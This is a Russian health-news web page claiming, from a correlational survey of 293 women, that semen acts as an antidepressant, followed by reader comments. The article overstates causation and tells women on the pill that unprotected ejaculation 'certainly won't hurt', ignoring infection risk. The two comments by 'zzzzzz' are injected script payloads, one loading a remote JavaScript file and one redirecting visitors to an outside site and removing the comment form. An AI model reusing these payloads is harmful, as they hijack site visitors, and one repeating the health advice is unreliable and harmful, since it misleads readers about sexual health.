Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кошмар! Сперма – антидепр...  >>  Кошмар! Сперма – антидепрессант!
 
Обратная связь
 

Кошмар! Сперма – антидепрессант!

Размер шрифта
27 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, сперма нужна не только для зачатия детей, у нее есть еще много других полезных свойств. Совсем  недавно ученым удалось выяснить, что вещества, содержащиеся в сперме, могут повышать настроение и даже уменьшать симптомы депрессии.

Кошмар! Сперма – антидепрессант!

Возможно, вы слышали об эффекте МакКлинтока: когда женщины репродуктивного возраста живут или работают вместе, через некоторое время их менструальные циклы синхронизируются. Общепринятым объяснением этого явления является то, что женщины реагируют на феромоны друг друга и каким-то образом эти вещества влияют на уровень женских гормонов. Однако в Университете Нью-Йорка два ученых-психолога обнаружили, что у лесбиянок отсутствует эффект МакКлинтока. Почему же? Гордон Галлуп и Ребекка Бурч пришли к выводу, что единственным существенным отличием между лесбиянками и гетеросексуальными женщинами является то, что последние имеют контакт со спермой. Ученые предположили, что именно химический состав спермы как-то влияет на эффект МакКлинтока. Но если это действительно так, то получается, что влагалище должно абсорбировать часть компонентов спермы, которые оказывают влияние на женские гормоны.

Известно, что сперматозоиды не взаимодействуют с влагалищем, они проникают через него далее в фаллопиевы трубы, где и происходит оплодотворение. Однако сперматозоиды составляют лишь около 3% от спермы. Остальное – это семенная жидкость. Она состоит в основном из воды, а также содержит порядка  50 различных веществ, таких как  сахар, иммуносупрессанты (чтобы иммунная система женщины не разрушала сперматозоиды), два женских половых гормона и вещества, повышающие настроение: эндорфины, эстрон, пролактин, окситоцин и серотонин.

Ткани влагалища очень хорошо абсорбируют, ведь в них проходит множество кровеносных и лимфатических сосудов. Основываясь на этом, а также на данных о содержании в сперме веществ, повышающих настроение, Галлуп, Бурч и их коллега Стивен Платек решили выяснить, связан ли контакт женщин со спермой с улучшением настроения. Они опросили 293 женщины на предмет того, занимаются они сексом с презервативом или без, и затем дали каждой заполнить стандартный тест на уровень настроения и депрессии. В сравнении с теми женщинами, которые всегда или почти всегда использовали презервативы, те, кто ими вообще не пользовался, продемонстрировали значительно меньше признаков депрессии. Женщины, не использующие презерватив, оказались в среднем «веселее» и по сравнению с теми, кто вообще не имел половых контактов.

В то же время, незащищенный секс обычно ассоциируется с негативной самооценкой и сниженным настроением. Так как в это понятие входит и секс без презерватива, ученые ожидали, что такой секс будет связан с более серьезными проявлениями депрессии. Однако в настоящем исследовании, среди женщин всегда или почти всегда использующих презерватив, около 20% сообщали о суицидальных мыслях, а среди женщин, кто лишь иногда им пользовался, эта цифра оказалась гораздо ниже и составила 7%. Среди тех, кто вообще не пользовался презервативом, процент суицидальных мыслей составил всего 5%. Таким образом, можно предположить,  что антидепрессанты, содержащиеся в сперме, могут оказывать значительное положительное влияние на настроение.

Наконец, стоит отметить, что кроме веществ-антидепрессантов в сперме также содержатся два женских половых гормона: фолликулостимулирующий (ФСГ) и лютеинизирующий (ЛГ) гормоны. ФСГ отвечает за созревание яйцеклеток в яичниках, а ЛГ участвует в контроле овуляции. Почему же сперма содержит вещества, которые стимулируют овуляцию? На самом деле, это имеет важное эволюционное значение. К примеру, сперма шимпанзе не содержит ЛГ или ФСГ, но самки во время овуляции имеют красную окраску ягодиц, что позволяет им сигнализировать о своей готовности к размножению. В противоположность этому, овуляция у женщин скрыта от окружающих и мужчина точно не знает, когда она наиболее готова к продолжению рода. Но если мужская сперма содержит половые гормоны, то такая сперма будет стимулировать овуляцию и оплодотворение произойдет с большей вероятностью.

Конечно, это не повод всем отказываться от презервативов. Но если, например, вы с мужем предохраняетесь с помощью таблеток, не стоит избегать эякуляцию во влагалище. Это точно не повредит, а возможно – улучшит ваше настроение!

Другие материалы о женском здоровье ищите на страницах нашего соответствующего спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
У каждой 10 женщины аллергия на сперму   Все что надо знать о бронхите   Ученые говорят, что свекровь может испортить вам жизнь после родов! Как жить?   Грустно? Вспомнили что-то плохое? Вот как бороться с плохим настроением!  
27 июня 201320 часов телевизора в неделю – вполовину меньше спермы! Как дальше жить? 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Еда и лекарства: когда их нельзя смешивать
Проблемы, с которыми справится секс
Что такое ПМС?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.